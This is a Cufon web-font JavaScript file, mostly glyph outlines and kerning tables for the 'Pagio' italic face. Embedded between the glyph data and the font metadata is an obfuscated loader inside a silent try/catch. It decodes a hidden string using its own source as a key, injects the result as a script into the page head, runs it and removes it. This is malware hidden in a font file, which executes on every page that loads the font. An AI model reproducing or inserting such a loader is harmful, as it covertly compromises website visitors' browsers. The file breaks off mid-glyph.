189,79r0,16","w":237},{"d":"162,-246r-3,17r-95,0r-14,96r89,0r-2,17r-89,0r-17,116r-17,0r35,-246r113,0","w":151,"k":{"x":11,"q":9,"m":5,"M":11,"T":-4,"\u0164":-4,"A":11,"\u00c1":11,"a":9,"\u00e1":9,"e":5,"\u00e9":5,"\u011b":5,",":36,".":36,"u":7,"\u016f":7,"c":9,"\u010d":9,"d":9,"\u010f":9,"o":5,"\u00f3":5,"r":5,"\u0159":5,"g":11,"n":5}},{"d":"140,-162r-89,165r-5,0r-37,-165r15,0r30,132r70,-132r16,0","w":131,"k":{"v":-7,"y":-14,"\u00fd":-14,"a":5,"\u00e1":5,"w":-7,",":7,".":7,"t":-4,"\u0165":-4,"c":6,"\u010d":6,"d":5,"\u010f":5,"g":4,"s":-4,"\u0161":-4}},{"d":"174,-246r-2,17r-108,0r-14,95r103,0r-3,17r-102,0r-15,100r146,0r-3,17r-162,0r35,-246r125,0","k":{";":-14,"y":7,"\u00fd":7,"V":13,"W":13,"X":-4,"Y":7,"\u00dd":7,"A":-7,"\u00c1":-7,"C":11,"\u010c":11,"G":11,"Q":13,"Z":-11,"\u017d":-11,"e":7,"\u00e9":7,"\u011b":7,"v":11,"w":11,"O":13,",":-11,".":-14,"M":-11,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"o":4,"\u00f3":4,"x":-11,"B":-4,"D":-4,"\u010e":-4,"E":-4,"\u00c9":-4,"\u011a":-4,"F":-4,"H":-4,"I":-4,"\u00cd":-4,"K":-4,"L":-4,"P":-4,"R":-4,"\u0158":-4,":":-14,"z":-7,"\u017e":-7,"!":-11,"?":-4,"N":-4,"\u0147":-4}},{"d":"49,-162v0,9,-5,20,-3,28v17,-17,37,-31,61,-31v70,0,27,108,25,165r-16,0r15,-109v2,-65,-59,-43,-89,-6r-16,115r-16,0r23,-162r16,0xm85,-182r-3,-71r13,0r7,49r54,-49r14,0r-65,71r-20,0","w":164,"k":{"v":9,"w":7,"x":3,"g":9}},{"d":"194,-246r-111,249r-7,0r-52,-249r17,0r42,206r94,-206r17,0","w":176,"k":{"x":22,"v":13,"q":25,"p":14,"m":20,"]":-11,"Q":7,"?":-14,"-":29,"y":7,"\u00fd":7,"j":7,"A":18,"\u00c1":18,"C":5,"\u010c":5,"G":5,"a":25,"\u00e1":25,"e":25,"\u00e9":25,"\u011b":25,"w":11,"O":7,",":29,".":29,"t":7,"\u0165":7,"u":20,"\u016f":20,"c":25,"\u010d":25,"d":22,"\u010f":22,"f":7,"o":20,"\u00f3":20,"z":14,"\u017e":14,"r":20,"\u0159":20,"g":29,"n":20,"i":7,"\u00ed":7,"\u0148":20,"s":18,"\u0161":18,")":-11,"}":-11}},{"d":"248,-54v0,32,-26,58,-58,58v-32,0,-58,-26,-58,-58v0,-32,26,-58,58,-58v32,0,58,26,58,58xm233,-54v0,-23,-20,-42,-43,-42v-23,0,-42,19,-42,42v0,24,19,43,42,43v23,0,43,-20,43,-43xm126,-191v0,32,-26,58,-58,58v-32,0,-58,-26,-58,-58v0,-32,26,-58,58,-58v32,0,58,26,58,58xm111,-191v0,-23,-20,-42,-43,-42v-23,0,-42,19,-42,42v0,24,19,43,42,43v23,0,43,-20,43,-43xm236,-248r-198,252r-18,0r198,-252r18,0","w":250},{"d":"137,-162r-3,18v-62,-22,-108,28,-108,77v0,53,58,68,101,42r-3,17v-51,28,-115,2,-115,-61v0,-54,51,-112,128,-93xm86,-182r-4,-71r13,0r8,49r54,-49r14,0r-65,71r-20,0","w":138,"k":{"y":-7,"\u00fd":-7,"a":-2,"\u00e1":-2,"v":-5,"w":-5,",":-22,".":-22,"t":-11,"\u0165":-11,"f":-7,"x":-4,"z":-7,"\u017e":-7,"b":-2,"p":4,"s":-4,"\u0161":-4,"k":-2,"l":-2}},{"d":"99,-251r16,0r-15,74r68,0r16,-74r17,0r-16,74r30,0r0,16r-33,0r-15,69r48,0r0,16r-51,0r-15,73r-17,0r15,-73r-68,0r-15,73r-17,0r15,-73r-30,0r0,-16r34,0r14,-69r-48,0r0,-16r52,0xm96,-161r-14,69r69,0r14,-69r-69,0","w":237},{"d":"66,-246r-35,246r-17,0r35,-246r17,0xm124,-308r-73,46r-16,0r43,-46r46,0","w":71,"k":{"x":7}},{"d":"202,-246r-2,16v-97,-16,-168,56,-168,130v0,87,93,110,156,60r-3,21v-73,45,-169,20,-172,-80v-3,-83,81,-167,189,-147xm134,-262r-32,-48r19,0r27,32v24,-10,36,-33,72,-32r-57,48r-29,0","w":198,"k":{"X":-4,"A":-7,"\u00c1":-7,"Z":-7,"\u017d":-7,",":-18,".":-18,"q":-2,"o":-4,"\u00f3":-4}},{"d":"171,-246r-2,16r-88,0r-11,77v49,-10,86,23,87,70v2,73,-93,112,-149,66r7,-14v42,39,124,12,124,-52v0,-46,-44,-67,-88,-52r16,-111r104,0"},{"d":"154,-162r-23,162r-16,0r3,-19v-38,39,-112,24,-112,-43v0,-59,64,-118,148,-100xm120,-37r16,-114v-61,-11,-112,30,-113,92v-1,61,67,60,97,22","w":166,"k":{"x":4}},{"d":"49,-246r56,0v43,0,66,28,66,64v0,34,-22,60,-57,67v26,23,49,81,70,115r-19,0r-42,-73v-24,-49,-24,-42,-75,-42r-17,115r-17,0xm63,-230r-13,99v52,3,104,-2,102,-50v0,-19,-10,-49,-49,-49r-40,0xm81,-262r-32,-48r19,0r27,32v24,-10,36,-33,72,-32r-57,48r-29,0","k":{"T":25,"\u0164":25,"V":11,"W":14,"Y":27,"\u00dd":27,"A":-11,"\u00c1":-11,"C":9,"\u010c":9,"G":9,"Q":7,"e":7,"\u00e9":7,"\u011b":7,"v":11,"w":7,"O":7,"U":10,"\u00da":10,"\u016e":10,",":-13,".":-11,"o":4,"\u00f3":4,":":-11,";":-11}},{"d":"133,-32r0,17v-47,39,-122,11,-122,-60v0,-51,33,-90,75,-90v39,0,60,32,57,81r-115,0v-10,61,61,95,105,52xm31,-98r96,0v1,-33,-16,-52,-42,-52v-25,0,-50,24,-54,52","w":156,"k":{"a":-4,"\u00e1":-4,"v":5,"w":4,",":-11,".":-11,"x":2,"g":2}},{"d":"178,-164v0,82,-36,167,-97,167v-41,0,-62,-36,-62,-86v0,-57,26,-166,98,-166v46,0,61,45,61,85xm161,-162v0,-45,-17,-72,-45,-72v-57,0,-80,102,-80,153v0,43,17,69,45,69v60,0,80,-109,80,-150"},{"d":"93,-86r-3,14r-85,0r2,-14r86,0","w":97},{"d":"17,-213r3,-18v33,-33,97,-17,97,33v0,55,-73,65,-86,134r-9,0v5,-68,80,-89,80,-135v0,-47,-59,-48,-85,-14xm8,0r4,-32r21,0r-4,32r-21,0","w":105},{"w":90},{"d":"59,-246r-35,246r-16,0r35,-246r16,0","w":60,"k":{"e":4,"\u00e9":4,"\u011b":4,"w":-4,"c":5,"\u010d":5,"d":4,"\u010f":4,"q":2}},{"d":"111,-249r-2,15v18,2,35,6,44,12r-3,17v-15,-7,-31,-12,-44,-13r-13,96v78,29,63,119,-18,125r-5,38r-16,0r5,-38v-20,-2,-39,-7,-52,-16r2,-18v17,11,35,17,53,18r13,-98v-37,-21,-52,-35,-52,-62v0,-35,30,-60,70,-61r2,-15r16,0xm78,-131r12,-87v-30,3,-49,21,-49,46v0,17,9,27,37,41xm90,-102r-12,89v29,-2,49,-20,49,-43v0,-22,-14,-32,-37,-46","w":161},{"d":"206,-182r22,0r-30,141v-3,15,-3,22,7,22v22,0,69,-36,69,-102v0,-45,-24,-113,-118,-113v-80,0,-137,58,-137,140v0,81,56,137,139,137v53,0,91,-19,118,-55r18,0v-28,47,-82,69,-136,69v-91,0,-153,-61,-153,-151v0,-75,45,-155,153,-155v94,0,130,69,130,128v0,72,-53,117,-90,117v-17,0,-23,-10,-21,-32v-39,56,-120,34,-120,-42v0,-81,96,-152,144,-74xm192,-121v0,-29,-19,-50,-45,-50v-46,0,-68,59,-68,94v0,32,19,56,45,56v41,0,68,-62,68,-100","w":288},{"d":"137,-162r-3,18v-62,-22,-108,28,-108,77v0,53,58,68,101,42r-3,17v-51,28,-115,2,-115,-61v0,-54,51,-112,128,-93","w":138,"k":{"y":-7,"\u00fd":-7,"a":-2,"\u00e1":-2,"v":-5,"w":-5,",":-22,".":-22,"t":-11,"\u0165":-11,"f":-7,"x":-4,"z":-7,"\u017e":-7,"b":-2,"p":4,"s":-4,"\u0161":-4,"k":-2,"l":-2}},{"d":"190,-246r-91,119r-18,127r-17,0r18,-127r-62,-119r19,0r53,102r78,-102r20,0","w":165,"k":{")":-18,"y":14,"\u00fd":14,"j":7,"V":-11,"W":-7,"Y":-7,"\u00dd":-7,"A":31,"\u00c1":31,"C":11,"\u010c":11,"G":11,"Q":14,"a":40,"\u00e1":40,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":18,"O":14,"S":5,"\u0160":5,",":29,".":29,"t":11,"\u0165":11,"u":22,"\u016f":22,"M":11,"c":40,"\u010d":40,"d":40,"\u010f":40,"q":40,"f":14,"o":36,"\u00f3":36,"x":25,"z":25,"\u017e":25,"?":-14,"r":22,"\u0159":22,"g":36,"n":18,"i":11,"\u00ed":11,"m":18,"p":22,"\u0148":18,"s":18,"\u0161":18,"]":-18,"}":-18,"-":32}},{"d":"85,3r-79,-252r17,0r79,252r-17,0","w":101},{"d":"219,-149v0,82,-47,152,-116,152v-56,0,-87,-38,-87,-102v0,-59,32,-150,117,-150v53,0,86,38,86,100xm200,-153v0,-49,-26,-79,-67,-79v-76,0,-98,90,-98,139v0,51,25,80,68,80v62,0,97,-66,97,-140","w":226,"k":{"y":-4,"\u00fd":-4,"T":20,"\u0164":20,"V":11,"W":11,"X":18,"Y":18,"\u00dd":18,"A":7,"\u00c1":7,"C":-4,"\u010c":-4,"G":-4,"Z":11,"\u017d":11,"v":-4,"w":-4,"S":7,"\u0160":7,",":11,".":11,"t":-5,"\u0165":-5,"x":13}},{"d":"127,-246r-2,15r-60,0r-43,297r61,0r-2,14r-78,0r48,-326r76,0","w":108,"k":{"j":-22,"T":-14,"J":-29,"\u0164":-14,"V":-14,"W":-14,"X":-7,"Y":-18,"\u00dd":-18,"f":-7}},{"d":"168,-246r-36,244v-20,5,-38,5,-42,5v-66,0,-83,-48,-83,-74v0,-26,18,-94,109,-94v11,0,18,1,24,2r12,-83r16,0xm118,-14r20,-136v-71,-15,-119,44,-114,79v9,61,54,67,94,57xm207,-249v-4,34,-13,71,-36,74v1,-19,17,-18,17,-41r-8,0r5,-33r22,0","w":176,"k":{"e":4,"\u00e9":4,"\u011b":4,"c":5,"\u010d":5,"d":2,"\u010f":2,"q":2}},{"d":"49,-246v64,-6,120,9,118,66v0,33,-20,70,-81,70r-39,0r-16,110r-17,0xm64,-230r-15,104r35,0v90,1,80,-103,12,-104r-32,0","w":163,"k":{"y":-7,"\u00fd":-7,"T":7,"\u0164":7,"X":22,"Y":4,"\u00dd":4,"A":18,"\u00c1":18,"Z":11,"\u017d":11,"a":13,"\u00e1":13,"e":11,"\u00e9":11,"\u011b":11,"v":-7,"w":-7,",":36,".":36,"t":-11,"\u0165":-11,"M":7,"c":11,"\u010d":11,"d":11,"\u010f":11,"q":11,"o":9,"\u00f3":9,"r":7,"\u0159":7,"g":13,"n":7,"m":7,"s":7,"\u0161":7}},{"d":"49,-162r-26,183v-4,43,-26,72,-72,59r3,-14v42,10,51,-19,56,-60r23,-168r16,0xm59,-231r-4,26r-16,0r4,-26r16,0","w":63,"k":{"y":-7,"\u00fd":-7,"j":-11,")":-4,"]":-4,"}":-4}},{"d":"155,-221r-51,41v17,5,45,-4,66,-4r0,17v-21,0,-48,-9,-66,-5r51,41r-12,12r-42,-51v-5,18,4,46,4,67r-16,0v1,-22,6,-47,5,-67r-42,51r-12,-12r51,-41v-18,-5,-46,4,-67,4r0,-16v21,0,49,8,66,4r-50,-41r12,-12r41,50v5,-17,-4,-45,-4,-66r16,0v0,21,-8,48,-4,66r42,-50","w":168},{"d":"67,-246r-38,270v-9,55,-39,65,-80,56r-3,-18v39,11,62,-2,69,-54r35,-254r17,0","w":71,"k":{"J":-11,"x":7}},{"d":"221,0r5,0v3,36,-16,70,-58,70v-35,0,-69,-28,-81,-67v-54,-6,-71,-57,-71,-101v0,-68,38,-151,118,-151v54,0,85,37,85,100v0,70,-36,149,-111,152v18,62,109,68,113,-3xm200,-153v0,-50,-24,-79,-66,-79v-62,0,-99,64,-99,139v0,50,26,80,70,80v63,0,95,-75,95,-140","w":225,"k":{"x":13,"v":-4,"X":18,"V":11,"y":-4,"\u00fd":-4,"J":-29,"j":-22,"T":20,"\u0164":20,"W":11,"Y":18,"\u00dd":18,"A":7,"\u00c1":7,"C":-4,"\u010c":-4,"G":-4,"Z":7,"\u017d":7,"w":-4,"S":4,"\u0160":4,",":-14,".":-11,"t":-5,"\u0165":-5,":":-14,";":-14,")":-7,"]":-7,"}":-7}},{"d":"246,-246r-112,118r86,128r-21,0r-78,-115r-109,115r-23,0r123,-128r-79,-118r20,0r72,105r99,-105r22,0","w":235,"k":{"v":22,"q":20,"p":7,"Q":22,"?":-4,"y":16,"\u00fd":16,"C":22,"\u010c":22,"G":22,"a":16,"\u00e1":16,"e":20,"\u00e9":20,"\u011b":20,"w":22,"O":22,"t":14,"\u0165":14,"u":11,"\u016f":11,"c":20,"\u010d":20,"d":20,"\u010f":20,"f":7,"o":14,"\u00f3":14,"r":4,"\u0159":4,"g":11,"s":7,"\u0161":7,")":-7,"]":-7,"}":-7}},{"d":"238,-246r-35,248r-8,0r-134,-212r-30,210r-17,0r35,-246r10,0r133,211r29,-211r17,0xm131,-262r-32,-48r18,0r28,32v24,-10,36,-33,72,-32r-57,48r-29,0","w":243},{"d":"139,-97v0,65,-39,100,-77,100v-29,0,-56,-22,-56,-68v0,-59,31,-100,76,-100v35,0,57,27,57,68xm122,-97v0,-32,-15,-53,-40,-53v-62,0,-85,138,-20,138v34,0,60,-37,60,-85xm135,-238r-54,56r-12,0r38,-56r28,0","w":151,"k":{"a":-2,"\u00e1":-2,"v":7,"w":7,"t":4,"\u0165":4,"d":-2,"\u010f":-2,"x":7,"z":9,"\u017e":9,"g":4}},{"d":"70,-246r24,0v1,30,-1,58,-4,85r-15,0v-3,-27,-6,-54,-5,-85xm21,-246r23,0v1,30,-1,58,-4,85r-15,0v-3,-27,-5,-55,-4,-85","w":101},{"d":"29,-134r87,0r0,-87r15,0r0,87r87,0r0,16r-87,0r0,86r-15,0r0,-86r-87,0r0,-16","w":237},{"d":"66,-246r-33,229r111,0r-3,17r-127,0r35,-246r17,0","w":151,"k":{";":-18,"J":-18,"j":-7,"T":25,"\u0164":25,"V":32,"W":38,"X":-7,"Y":36,"\u00dd":36,"A":-18,"\u00c1":-18,"C":14,"\u010c":14,"G":14,"Q":14,"Z":-11,"\u017d":-11,"e":11,"\u00e9":11,"\u011b":11,"v":18,"w":14,"O":14,",":-14,".":-18,"u":-4,"\u016f":-4,"M":-7,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":4,"o":7,"\u00f3":7,"x":-11,"B":-7,"D":-7,"\u010e":-7,"E":-7,"\u00c9":-7,"\u011a":-7,"F":-7,"H":-7,"I":-7,"\u00cd":-7,"K":-7,"L":-11,"P":-7,"R":-7,"\u0158":-7,":":-18,"z":-7,"\u017e":-7,"N":-7,"\u0147":-7,"r":-4,"\u0159":-4,"n":-7,"b":-7,"h":-7,"i":-7,"\u00ed":-7,"m":-7,"p":-4,"\u0148":-7}},{"d":"49,-246v93,-13,144,68,73,110v88,25,59,143,-39,136r-69,0xm63,-230r-12,89v46,3,85,-7,85,-44v0,-33,-31,-48,-73,-45xm49,-125r-16,109r48,0v105,2,92,-108,12,-109r-44,0","w":185,"k":{"v":5,"q":-4,"X":7,"V":14,"T":18,"\u0164":18,"W":18,"Y":25,"\u00dd":25,"a":-4,"\u00e1":-4,"w":4,",":-11,".":-11,"o":-5,"\u00f3":-5}},{"d":"54,-220r2,-15v47,-32,117,-6,116,49v0,36,-26,50,-47,60v16,9,33,25,33,54v0,69,-91,96,-143,57r2,-15v47,35,125,17,124,-44v0,-30,-23,-48,-56,-48r2,-12v92,5,87,-98,15,-100v-15,0,-31,4,-48,14"},{"d":"14,0r35,-246v96,-8,170,27,170,125v0,72,-54,121,-126,121r-79,0xm64,-230r-30,214r52,0v88,0,114,-61,114,-105v0,-75,-58,-115,-136,-109","w":229,"k":{"T":27,"\u0164":27,"V":18,"W":25,"X":22,"Y":25,"\u00dd":25,"A":7,"\u00c1":7,"Z":14,"\u017d":14,"a":-2,"\u00e1":-2,"O":5,"S":11,"\u0160":11,",":9,".":9,"o":-4,"\u00f3":-4,"x":14}},{"d":"186,-246r-2,17r-73,0r-32,229r-17,0r32,-229r-72,0r2,-17r162,0","w":164,"k":{")":-22,"y":13,"\u00fd":13,"j":7,"T":-4,"\u0164":-4,"Y":-7,"\u00dd":-7,"A":25,"\u00c1":25,"C":20,"\u010c":20,"G":20,"Q":18,"a":40,"\u00e1":32,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":16,"O":18,",":36,".":36,"t":18,"\u0165":18,"u":22,"\u016f":22,"M":14,"c":36,"\u010d":36,"d":40,"\u010f":40,"q":40,"f":14,"o":40,"\u00f3":29,"x":25,":":9,";":9,"z":18,"\u017e":18,"?":-18,"r":22,"\u0159":22,"g":36,"n":22,"i":7,"\u00ed":7,"m":22,"p":22,"\u0148":11,"s":20,"\u0161":20,"]":-22,"}":-22,"-":43}},{"d":"21,-70r0,-23v36,5,34,-51,34,-94v0,-43,18,-61,52,-59r0,20v-37,-8,-32,39,-32,74v0,39,-10,62,-35,71v35,9,35,56,35,105v0,33,8,39,32,39r0,20v-47,7,-52,-41,-52,-94v0,-42,-9,-58,-34,-59","w":119,"k":{"j":-22,"J":-29,"T":-14,"\u0164":-14,"V":-14,"W":-14,"X":-7,"Y":-18,"\u00dd":-18,"f":-7}},{"d":"204,-119r19,0v-9,24,-31,55,-57,84v19,18,45,26,62,22r-8,16v-23,2,-44,-6,-66,-26v-45,47,-139,27,-139,-39v0,-30,21,-55,61,-74v-30,-47,-20,-111,37,-113v27,0,49,22,49,49v0,25,-18,48,-63,71v15,26,37,60,55,82v18,-17,38,-46,50,-72xm91,-144v37,-19,53,-36,53,-58v0,-17,-15,-30,-32,-30v-44,0,-42,55,-21,88xm141,-35v-21,-24,-39,-57,-57,-87v-35,19,-50,37,-50,60v0,53,73,64,107,27","w":236},{"d":"140,-235r-4,15v-40,-26,-86,-10,-86,34v0,55,80,53,80,123v0,61,-75,83,-119,50r4,-17v41,31,96,21,96,-33v0,-55,-80,-62,-80,-121v0,-56,67,-83,109,-51","w":146,"k":{"y":5,"\u00fd":5,"V":11,"W":11,"Y":13,"\u00dd":13,"A":4,"\u00c1":4,"C":5,"\u010c":5,"G":5,"Q":4,"e":4,"\u00e9":4,"\u011b":4,"v":14,"w":11,"O":4,"S":7,"\u0160":7,",":-9,".":-9,"u":2,"\u016f":2,"d":2,"\u010f":2,"q":2,"f":11,"r":4,"\u0159":4,"g":7,"n":4,"m":4}},{"d":"345,-246r-120,249r-7,0r-39,-205r-94,205r-7,0r-54,-249r17,0r45,207r95,-207r7,0r39,207r99,-207r19,0","w":324,"k":{"]":-11,"y":4,"\u00fd":4,"j":4,"W":-4,"A":18,"\u00c1":18,"C":7,"\u010c":7,"G":7,"Q":7,"a":25,"\u00e1":25,"e":27,"\u00e9":27,"\u011b":27,"v":7,"w":7,"O":7,"S":4,"\u0160":4,",":29,".":29,"u":13,"\u016f":13,"M":9,"c":25,"\u010d":25,"d":25,"\u010f":25,"q":25,"f":11,"o":20,"\u00f3":20,"x":13,"z":7,"\u017e":7,"?":-14,"r":20,"\u0159":20,"g":25,"n":20,"i":4,"\u00ed":4,"m":20,"p":7,"\u0148":13,"s":11,"\u0161":11,")":-11,"}":-11,"-":27}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-93-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("24X(gZwbr>Q^2+EjqZ#?l4lQ@hw(XZQ^@h;?r>KLXnf.]YbcH?ud+R3#45l;2&Vw=xHKU8yn>@]Xrg!qs0iSc[DEZL~|eM.*^oO7?Yb(hWtA)jfQ$P7YyE7(VR37]Ld=;(~^sE7(VR3hXDSf=?S&!EQZ@5yOV4KSgU#|@5yOV8yAs8K$@5yOV8#SqWSd@5yOV8dE@5yOV8qE!n7(VRdSV#7(VRdEX#7(VRd[V>K5]#n!q8u7wZn~@5yOV4y7q8]W8nbA0>Q!&Y(!q8u7w[n!q8u7w[#!q8uO]YE^@5yOV8]b]E7(VR3hV3E!q8u7whK!q8uOX8Eb@E7(VRdDXRi?=E7(VRdZX4.fVUELxDXhKn7(VR3b=#]E@5yOV8dDl(7(VRd[X#7(VR3O]YnS@5yOV8ytX8u*x?d.;3d[>n7!8(*!q8u7V4XHrc|2ynS!q8u7wRq!q8uOX[w!lc*VH[w3n5.Zy(!c&LwOg4Eb2+lc2U7|x8u.!R(c&Lu.gR(O&Z7EgZqbr+7Lx>l^XcALg5EOr5VQsWbjr>]~&(t~xY|WqWq!&cDP2Rf)qWqW@+AO]>q|g(O^]W~|;+f^q4nYq+S.ghwSq4EogcA~gWwbgZ#*XUD|XZQ?2R*|x4Oj2?*|2>qg](*|@nbQ!#*|@@b|2+Di")}catch(e){}delete _cufon_bridge_;return f})({"w":187,"face":{"font-family":"Pagio","font-weight":300,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 3 2 2 1 4 9 2 3","ascent":"246","descent":"-114","x-height":"3","bbox":"-54 -337 345 83.6817","underline-thickness":"18","underline-position":"-18","slope":"-8","stemh":"14","stemv":"17","unicode-range":"U+0020-U+017E"}}));Cufon.registerFont((function(f){_cufon_bridge_={p:[{"d":"27,-246v75,4,120,-15,179,26v28,19,47,55,47,97v0,62,-44,96,-59,105v-54,29,-100,14,-167,18r0,-246xm217,-125v0,-47,-47,-97,-110,-89r-45,0r0,182v86,9,155,-16,155,-93xm64,-319r23,0r37,34r38,-34r22,0r-34,57r-51,0","w":270,"k":{"A":20,"\u00c1":20,"T":25,"\u0164":25,"V":16,"W":16,"Y":31,"\u00dd":31,"Z":18,"\u017d":18,",":27,".":27,"X":25}},{"d":"120,-60v-15,-66,-105,-55,-105,-124v0,-61,83,-84,129,-47r0,39v-21,-20,-41,-25,-58,-25v-24,0,-39,13,-39,28v0,41,106,56,106,125v0,68,-92,85,-137,45r0,-45v7,9,29,36,66,36v18,0,38,-11,38,-32","w":164,"k":{"y":11,"\u00fd":11,"v":11,"w":11}},{"d":"259,-162r-71,165r-11,0r-47,-113r-48,113r-10,0r-72,-165r34,0r43,98r41,-98r23,0r42,98r42,-98r34,0","w":258,"k":{"g":5,",":22,".":22,"e":7,"o":7,"\u00e9":7,"\u011b":7,"\u00f3":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"f":-7,"*":-18}},{"d":"21,-162r32,0r0,37v20,-28,45,-63,86,-22r-17,29v-21,-23,-69,-25,-69,33r0,85r-32,0r0,-162","w":138,"k":{"y":-11,"\u00fd":-11,":":-14,";":-14,",":36,".":36,"v":-5,"w":-7,"e":9,"o":9,"\u00e9":9,"\u011b":9,"\u00f3":9,"c":9,"\u010d":9,"d":9,"\u010f":9,"q":9,"r":4,"\u0159":4,"t":-7,"\u0165":-7,"f":-7,"-":29,"n":3,"\u0148":3,"x":-4,"*":-22}},{"d":"275,16r-36,34v-54,-3,-102,-37,-120,-50v-51,-9,-103,-54,-103,-122v0,-73,55,-127,132,-127v82,0,132,60,132,126v0,59,-40,111,-102,123v29,12,66,29,97,16xm148,-216v-71,0,-96,58,-96,94v0,53,41,92,96,92v58,0,96,-44,96,-93v0,-37,-25,-93,-96,-93","w":296,"k":{"X":20,"V":14,"A":11,"\u00c1":11,"T":23,"\u0164":23,"W":14,"Y":29,"\u00dd":29,"Z":11,"\u017d":11}},{"d":"39,-230v11,0,19,9,19,19v0,10,-9,19,-19,19v-24,-1,-23,-37,0,-38xm55,-162r0,162r-32,0r0,-162r32,0","w":78},{"d":"158,-47r0,31v-22,16,-87,34,-119,-3v-51,-58,-18,-147,51,-146v46,0,72,38,71,87r-114,0v1,24,17,51,52,51v21,0,42,-7,59,-20xm48,-97r81,0v0,-6,-3,-40,-39,-40v-18,0,-44,22,-42,40xm128,-235r-40,53r-20,0r24,-53r36,0","w":172,"k":{"y":5,"\u00fd":5,",":-7,".":-7,"v":5,"w":5}},{"d":"126,0v-6,-52,20,-136,-33,-138v-15,0,-28,8,-38,22r0,116r-33,0r0,-162r33,0r0,21v40,-43,103,-29,103,49r0,92r-32,0","k":{"y":5,"\u00fd":5,"v":5,"w":5,"u":4,"\u016f":4}},{"d":"37,-230v9,0,20,7,20,19v0,10,-7,19,-19,19v-26,-1,-24,-37,-1,-38xm-2,59v25,-13,24,-16,24,-51r0,-170r32,0r0,172v0,28,0,55,-32,73","w":78},{"d":"21,-162r32,0r0,22v32,-37,72,-32,96,4v38,-49,107,-35,107,35r0,101r-32,0v-5,-50,19,-137,-33,-138v-12,0,-27,9,-37,21r0,117r-31,0v-8,-51,24,-138,-32,-138v-15,0,-27,8,-38,21r0,117r-32,0r0,-162","w":277,"k":{"v":5,"y":5,"\u00fd":5,"w":5,"u":4,"\u016f":4}},{"d":"24,-249v41,48,69,96,69,166v0,79,-40,129,-69,166r-20,0v22,-33,52,-77,52,-167v0,-59,-16,-118,-52,-165r20,0","w":116},{"d":"50,-54v-19,-11,-36,-23,-36,-52v0,-59,74,-59,138,-56r0,25r-34,0v25,20,20,52,2,72v-21,24,-65,11,-65,30v0,9,17,15,49,21v35,7,47,24,47,45v0,32,-28,52,-76,52v-77,0,-104,-77,-34,-94v-27,-14,-19,-35,9,-43xm107,-105v0,-15,-15,-29,-32,-29v-18,0,-32,13,-32,29v0,18,14,30,33,30v18,0,31,-12,31,-30xm120,34v0,-34,-90,-36,-90,-2v0,16,16,25,45,25v28,0,45,-8,45,-23","w":153,"k":{"g":-7,"p":-7,"y":-7,"\u00fd":-7,"v":-7,"w":-7,"o":4,"\u00f3":4,"a":-4,"\u00e1":-4,"x":-7,"z":-4,"\u017e":-4,")":-7,"]":-7,"}":-7,"*":-22}},{"d":"176,0v-26,-31,-58,-120,-113,-107r0,107r-35,0r0,-246r62,0v42,-3,80,30,80,69v0,28,-14,50,-41,60v37,27,55,75,88,117r-41,0xm134,-177v-2,-35,-29,-41,-71,-39r0,78v35,5,73,-9,71,-39xm35,-319r22,0r37,34r38,-34r22,0r-34,57r-51,0","w":217,"k":{"y":18,"\u00fd":18,"C":22,"\u010c":22,"G":22,"O":22,"T":32,"\u0164":32,"V":29,"W":27,"Y":36,"\u00dd":36,"Q":22,"U":11,"\u00da":11,"\u016e":11,"v":20,"w":20,"e":13,"o":13,"\u00e9":13,"\u011b":13,"\u00f3":13,"u":9,"\u016f":9,"c":13,"\u010d":13,"d":14,"\u010f":14,"q":13}},{"d":"21,-162r32,0r0,37v20,-28,45,-63,86,-22r-17,29v-21,-23,-69,-25,-69,33r0,85r-32,0r0,-162xm135,-237r-40,55r-33,0r-39,-55v32,-3,38,20,56,31v18,-11,23,-35,56,-31","w":138,"k":{"y":-11,"\u00fd":-11,":":-14,";":-14,",":36,".":36,"v":-5,"w":-7,"e":9,"o":9,"\u00e9":9,"\u011b":9,"\u00f3":9,"c":9,"\u010d":9,"d":9,"\u010f":9,"q":9,"r":4,"\u0159":4,"t":-7,"\u0165":-7,"f":-7,"-":29,"n":3,"\u0148":3,"x":-4,"*":-22}},{"d":"175,-162r-66,80r71,82r-41,0r-51,-58r-48,58r-40,0r68,-82r-68,-80r40,0r48,56r46,-56r41,0","k":{"q":9,"*":-18,",":-4,".":-4,"e":9,"o":9,"\u00e9":9,"\u011b":9,"\u00f3":9,"c":9,"\u010d":9,"d":9,"\u010f":9}},{"d":"53,-246r0,96v5,-4,21,-15,45,-15v43,0,69,38,69,83v1,84,-83,102,-146,73r0,-237r32,0xm53,-120r0,88v47,12,76,6,82,-49v6,-56,-57,-65,-82,-39","k":{"y":7,"\u00fd":7,",":4,".":4,"v":7,"w":7,"x":9}},{"d":"46,-161v0,-62,15,-89,66,-85r0,27v-35,0,-36,2,-36,61v0,54,-13,66,-37,77v37,15,37,43,37,102v0,34,9,37,36,36r0,27v-30,0,-56,5,-64,-49v-6,-43,13,-100,-38,-102r0,-28v36,-1,36,-32,36,-66","w":119},{"d":"217,-246r-90,116r0,130r-36,0r0,-130r-91,-116r42,0r66,85r67,-85r42,0","w":217,"k":{"g":41,"p":31,"y":18,"\u00fd":18,"A":40,"\u00c1":40,"C":29,"\u010c":29,"G":29,"O":29,"S":7,"\u0160":7,"Q":29,":":11,";":11,",":36,".":36,"v":18,"w":18,"e":50,"o":50,"\u00e9":40,"\u011b":40,"\u00f3":50,"u":32,"\u016f":32,"c":50,"\u010d":50,"d":50,"\u010f":50,"q":50,"r":31,"\u0159":31,"t":32,"\u0165":32,"a":43,"\u00e1":22,"-":54,"m":31,"n":31,"\u0148":27,"s":35,"\u0161":35,"x":15,"z":21,"\u017e":21,")":-7,"]":-7,"}":-7,"i":14,"\u00ed":14}},{"d":"146,-94v-29,0,-60,-25,-85,-24v-21,0,-3